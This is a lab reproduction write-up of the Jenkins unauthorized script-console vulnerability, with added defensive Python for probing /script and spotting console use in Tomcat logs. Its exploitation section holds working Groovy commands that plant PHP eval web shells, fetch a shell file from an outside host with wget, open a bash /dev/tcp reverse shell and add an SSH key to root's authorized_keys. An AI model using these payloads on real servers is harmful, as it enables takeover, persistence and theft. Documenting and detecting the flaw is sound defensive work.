Jenkins unauthorized access vulnerability reproduction
1 Install Jenkins
wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz
wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war
wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz
#install the JDK
tar zxvf jdk-8u45-linux-x64.tar.gz
mv jdk1.8.0_45 /usr/local/
mv jdk-8u45-linux-x64.tar.gz /usr/local/src/
#add it to the system environment variables
cat >>/etc/profile << EOF
export JAVA_HOME=/usr/local/jdk1.8.0_45
export JRE_HOME=\${JAVA_HOME}/jre
export CLASSPATH=.:\${JAVA_HOME}/lib:\${JRE_HOME}/lib
export PATH=\${JAVA_HOME}/bin:\$PATH
EOF
#reload the profile and check the Java version
source /etc/profile
java -version
#install Tomcat
tar zxvf apache-tomcat-8.5.4.tar.gz
mv apache-tomcat-8.5.4 /usr/local/jenkins
rm -rf /usr/local/jenkins/webapps/*
mv apache-tomcat-8.5.4.tar.gz /usr/local/src/
#set the Tomcat character encoding and port
vim /usr/local/jenkins/conf/server.xml
<Connector port="8080" URIEncoding="UTF-8" protocol="HTTP/1.1"
connectionTimeout="20000"
redirectPort="8443" />
#start Jenkins
mv jenkins_2.121.2.war /usr/local/jenkins/webapps/jenkins.war
/usr/local/jenkins/bin/startup.sh
2 Vulnerability description
By default, users of the Jenkins dashboard can open the script console and run operating-system commands from it. An attacker who reaches that console, through unauthenticated access or by brute-forcing user passwords, can thereby gain control of the server.
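The condition described above can be checked from the defender's side with a single unauthenticated request. The script below is an added example, not part of the original write-up: it requests /script with no session or credentials and classifies the reply, so an administrator can confirm whether anonymous users are being served the Groovy console. The base URL is the lab address used in this write-up; the markers used to recognise the console page (a textarea named "script") and the login form (a form posting to j_acegi_security_check or, in newer releases, j_spring_security_check) are assumptions about Jenkins' HTML.

```python
"""Audit check: is the Jenkins script console served to anonymous users?

Added example, not code from the original write-up. Requests /script without
credentials and classifies the answer. Host/port/context are the write-up's lab
values; the HTML markers below are assumptions about Jenkins' pages.
"""
import urllib.error
import urllib.request
from dataclasses import dataclass

JENKINS_BASE = "http://192.168.22.54:8080/jenkins"  # lab address from the write-up


@dataclass
class ProbeResult:
    status: int            # HTTP status of the final response
    body: str              # decoded response body
    final_url: str = ""    # URL after any redirects


def classify(result: ProbeResult) -> str:
    """Turn the unauthenticated reply from /script into an audit verdict."""
    if result.status == 200:
        if "/login" in result.final_url:
            return "AUTH_REQUIRED"      # redirected to the login page
        if 'name="script"' in result.body:
            return "OPEN"               # the Groovy console form is served to anonymous users
        if "j_acegi_security_check" in result.body or "j_spring_security_check" in result.body:
            return "AUTH_REQUIRED"      # login form served in place of the console
    if result.status in (302, 401):
        return "AUTH_REQUIRED"
    if result.status == 403:
        return "DENIED"                 # security is on and anonymous lacks the permission
    return "UNKNOWN"


def probe(base_url: str, timeout: float = 5.0) -> ProbeResult:
    """GET <base_url>/script with no session cookie and no credentials."""
    url = base_url.rstrip("/") + "/script"
    req = urllib.request.Request(url, headers={"User-Agent": "jenkins-console-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:  # follows redirects
            return ProbeResult(resp.status, resp.read().decode("utf-8", "replace"), resp.geturl())
    except urllib.error.HTTPError as err:  # 401/403/404 replies arrive here
        return ProbeResult(err.code, err.read().decode("utf-8", "replace"), err.geturl())


if __name__ == "__main__":
    verdict = classify(probe(JENKINS_BASE))
    print(f"{JENKINS_BASE}/script -> {verdict}")
```

An "OPEN" verdict means the instance is in the state this write-up reproduces; the fix is to enable security in Jenkins (a security realm plus an authorization strategy that does not grant Administer to anonymous), after which the same probe should report "AUTH_REQUIRED" or "DENIED".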
3 Exploitation
1. Jenkins unauthorized access allows command execution
http://192.168.22.54:8080/jenkins/manage
http://192.168.22.54:8080/jenkins/script
println "ifconfig -a".execute().text    // executes a system command
Writing a web shell:
new File("/var/www/html/jenkins1.php").write('<?php @eval($_POST[cmd]);?>');
1. println "wget http://shell.secpulse.com/data/t.txt -O /var/www/html/secpulse.php".execute().text
2. new File("/var/www/html/secpulse.php").write('<?php @eval($_POST[s3cpu1se]);?>');
3. def webshell = '<?php @eval($_POST[s3cpu1se]);?>'
new File("/var/www/html/secpulse.php").write("$webshell");
4. def execute(cmd) {
def proc = cmd.execute()
proc.waitFor()
}
execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/secpulse.php' ] )
execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/secpulse.php' ] )
// -n: do not append a trailing newline
2. Trying a reverse shell through command execution
Tried a reverse shell from the dialog with nc listening locally; found it did not work. Tried pinging back and found the network was unreachable, so then hoped to use a forward (bind) shell instead.
println 'bash -i >& /dev/tcp/192.168.22.34/4445 0>&1'.execute().text
3. Upload your own public key
println 'echo PUBLIC_KEY_CONTENTS >> /root/.ssh/authorized_keys'.execute().text
ssh -i id_rsa 192.168.22.54
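Every step in section 3 (writing the web shell, the reverse-shell attempt, appending an SSH key) goes through the same place: a request to the script console. That makes /script and /scriptText in the Tomcat access log the common trace to hunt for. The detector below is an added example, not part of the original write-up. It assumes Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b) and the /jenkins context path used in this lab; the log lines are constructed for the example, with the attacker address taken from the write-up.

```python
"""Detect script-console use in Tomcat access logs.

Added example, not code from the original write-up. Assumes Tomcat's default
access log pattern and the /jenkins context path. SAMPLE_LOG is constructed.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Console endpoints relative to the Jenkins context path. /script is the HTML
# console; /scriptText is the same console driven from the command line.
CONSOLE_PATHS = ("/script", "/scriptText")

# Constructed sample: one session that opens the console and submits scripts,
# normal job traffic from another host, and a denied attempt from a third.
SAMPLE_LOG = """\
192.168.22.34 - - [12/Aug/2018:10:15:31 +0800] "GET /jenkins/manage HTTP/1.1" 200 18342
192.168.22.34 - - [12/Aug/2018:10:15:32 +0800] "GET /jenkins/script HTTP/1.1" 200 4521
192.168.22.34 - - [12/Aug/2018:10:15:40 +0800] "POST /jenkins/script HTTP/1.1" 200 4877
192.168.22.34 - - [12/Aug/2018:10:15:55 +0800] "POST /jenkins/scriptText HTTP/1.1" 200 63
192.168.22.10 - - [12/Aug/2018:10:16:02 +0800] "GET /jenkins/static/abc/css/style.css HTTP/1.1" 200 9021
192.168.22.10 - - [12/Aug/2018:10:16:05 +0800] "GET /jenkins/job/build1/ HTTP/1.1" 200 12044
10.0.0.7 - - [12/Aug/2018:10:17:00 +0800] "GET /jenkins/script HTTP/1.1" 403 1289
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def console_hits(lines, context="/jenkins"):
    """All requests for the script console endpoints under the given context path."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(context):
            continue
        if rec["path"][len(context):] in CONSOLE_PATHS:
            hits.append(rec)
    return hits


def executed(hits):
    """Hits where a script was actually submitted and accepted: POST answered with 200."""
    return [h for h in hits if h["method"] == "POST" and h["status"] == 200]


def by_source(hits):
    """Count console requests per client address."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    hits = console_hits(SAMPLE_LOG.splitlines())
    for h in executed(hits):
        print(f"[{h['time']}] script executed from {h['ip']} via {h['path']}")
    print("console requests by source:", dict(by_source(hits)))
```

A GET of /script only proves someone looked at the console; the POST with a 200 reply is the event that corresponds to a script having run, so that is the line to alert on. The 403 from the third host shows what the same request looks like once authorization is enforced.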